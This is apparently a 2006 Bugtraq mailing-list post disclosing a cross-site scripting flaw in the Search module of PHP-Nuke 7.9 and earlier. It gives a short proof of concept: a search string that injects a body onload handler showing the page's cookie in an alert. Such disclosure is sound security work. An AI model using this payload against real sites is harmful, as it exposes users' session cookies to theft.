[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

PHP-Nuke <= 7.9 Search XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHP-Nuke <= 7.9 Search XSS Vulnerability
From: try_og@xxxxxxxxxxx
Date: 8 Jun 2006 12:32:39 -0000

# PHP-Nuke <= 7.9 Search module XSS Vulnerability
# It could work on later versions if PHP-Nuke does not patch it.

1: Enter: http://[host]/modules.php?name=Search
2: Search for: "><body onload="alert(document.cookie)

// You'll get a javascript alert with your cookie in it.

# Credits: O.G.

Follow-Ups:
- Re: PHP-Nuke <= 7.9 Search XSS Vulnerability
  - From: Paul Laudanski

Prev by Date: Back-end = 0.7.2.1 (jpcache.php) Remote command execution
Next by Date: [SECURITY] [DSA 1091-1] New TIFF packages fix arbitrary code execution
Previous by thread: Back-end = 0.7.2.1 (jpcache.php) Remote command execution
Next by thread: Re: PHP-Nuke <= 7.9 Search XSS Vulnerability
Index(es):
- Date
- Thread